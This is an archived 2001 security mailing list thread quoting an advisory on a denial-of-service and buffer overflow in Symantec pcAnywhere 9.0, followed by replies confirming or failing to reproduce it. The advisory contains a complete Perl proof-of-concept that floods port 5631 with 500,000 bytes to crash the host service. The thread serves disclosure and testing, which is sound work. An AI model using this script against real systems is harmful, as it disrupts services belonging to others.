Vulnerability Development mailing list archives
Re: Symantec pcAnywhere 9.0 DoS / Buffer Overflow
From: Shashi Dookhee <shashi () TRAFFIC CO UK>
Date: Thu, 15 Feb 2001 01:47:10 +0000
I was able to verify this overflow on NT 4.0, with Service Pack 6a. Thanks Shashi Dookhee Head of IT Infrastructure e-mail: shashi () traffic co uk ********************************************************************** http://www.traffic.co.uk Traffic Interactive Limited 191 Old Marylebone Road London NW1 5DW Telephone (Direct Line): +44 (0)20 7298 8222 Telephone (Switchboard): +44 (0)20 7298 8200 Facsimile: +44 (0)20 7298 8201 ISDN: +44 (0)20 7298 8299 ********************************************************************** Traffic Interactive is a full service new media agency helping clients maximise their brand communications across all interactive digital platforms. We offer, consultancy, strategic development, web site design, production & programming, on-line marketing & advertising. ********************************************************************** Privileged/Confidential Information may be contained in this message. If you are not the addressee indicated in the message (or responsible for the delivery of the message to such person), you may not copy or deliver this message to anyone. In such case, you should destroy this message and kindly notify the sender by reply e-mail. Please advise immediately if you or your employer does not consent to Internet e-mail for messages of this kind. Opinions, conclusions and other information in this message that do not relate to the official business of Traffic Interactive Limited shall be understood as neither given nor endorsed by them. Traffic Interactive Limited. Registered in England. Registered Number 3164767. ********************************************************************** On Mon, 12 Feb 2001, Eddie Harari wrote:
Hi , I could not repeat this Overflow on a Win2K. Just Thoght you would like to know ... -----Original Message----- From: Zoa_Chien [mailto:zoachien () SECURAX ORG] Sent: Monday, February 12, 2001 1:22 AM To: VULN-DEV () SECURITYFOCUS COM Subject: Symantec pcAnywhere 9.0 DoS / Buffer Overflow ============================================================================ = Securax-SA-14 Security Advisory belgian.networking.security Dutch ============================================================================ = Topic: Symantec pcAnywhere 9.0 DoS / Buffer Overflow Announced: 2001-02-08 Affects: Symantec PcAnywhere 9.0 on Microsoft Windows 98 SE ============================================================================ = Note: This entire advisory has been based upon trial and error results. We can not ensure the information below is 100% correct being that we do not have any source code to audit. This document is subject to change without prior notice. If you happen to find more information / problems concerning the below problem or further varients please contact me on the following email incubus () securax net, or you can contact info () securax org. I. Problem Description ----------------------- Symantec PcAnywhere is a program that will allow others (who are authorised to have access :)) to use your pc. It's simular to a Windows NT 4.0 terminal server. PcAnywhere (when it's configured to 'be a host pc') listens on 2 ports, 5631 (pcanywheredata, according to nmap) and 65301 (pcanywhere). And when a user sends certain data in a particular way, pcAnywhere will crash. When a large amount (it depends, sometimes the host will go down with 320k characters, sometimes, you will have to send 500k bytes of data) are sent to a 'waiting' host on the pcanywheredata port, "AWHOST32.EXE" will crash, and give an error on the screen, and write the "Unexpected program error" to a logfile. (with EAX, EBX, ... so read them, you'll find the yummy 0x61616161) Oh yeah, don't use uppercase characters, as PcAnywhere won't crash on them. Why no exploit, just a lame Denial of Service? 1.) because I suck in win32 debugging / overflowing (but i'm reading) /* so if I can overflow win32 progs, i'll code an exploit */ 2.) as the amount of data is variable, it's hard to overflow.. The DoS code: <--bof--> #!/usr/bin/perl # Symantec PcAnywhere 9.0 Denial of Service # ----------------------------------------- # by incubus <incubus () securax net> # http://www.hexyn.be # # http://www.securax.net # All my love to Tessa. # Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero, # Zym0tic, segfault, #securax () irc hexyn be # Thanks to jurgen swennen, for letting me (ab)use his computer. # # this is intended as proof of concept, do not abuse! use IO::Socket; $host = "$ARGV[0]"; $port = 5631; if ($#ARGV<0) { print "use it like: $0 <hostname>\n"; exit(); } $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "damn, "; print "hello\n"; $buf = ""; for($counter = 0; $counter < 500000; $counter++) { $buf .= "\x61"; } print $socket "$buf\n"; close($socket); exit(); <--eof--> II. Impact ---------- If someone exploits this, than Symantec is forced to rename the name of this product to PcAnyoneAnywhere or something... No, seriously, this could lead to a compromise of a system. III. possible workarounds ------------------------- This advisory was also sent to Symantec (info () symantec com), we'll see what they do with it... IV credits ---------- love to Tessa. greetz go out to : f0bic, r00t, Zym0t1c, vorlon, cicer0, tomicron, segfau|t, and so many, many others I forgot... ============================================================================ = For more information incubus () securax org Website http://www.securax.org Advisories/Text http://www.securax.org/pers ---------------------------------------------------------------------------- -
Current thread:
- Symantec pcAnywhere 9.0 DoS / Buffer Overflow Zoa_Chien (Feb 11)
- <Possible follow-ups>
- Re: Symantec pcAnywhere 9.0 DoS / Buffer Overflow Eddie Harari (Feb 14)
- Re: Symantec pcAnywhere 9.0 DoS / Buffer Overflow Shashi Dookhee (Feb 14)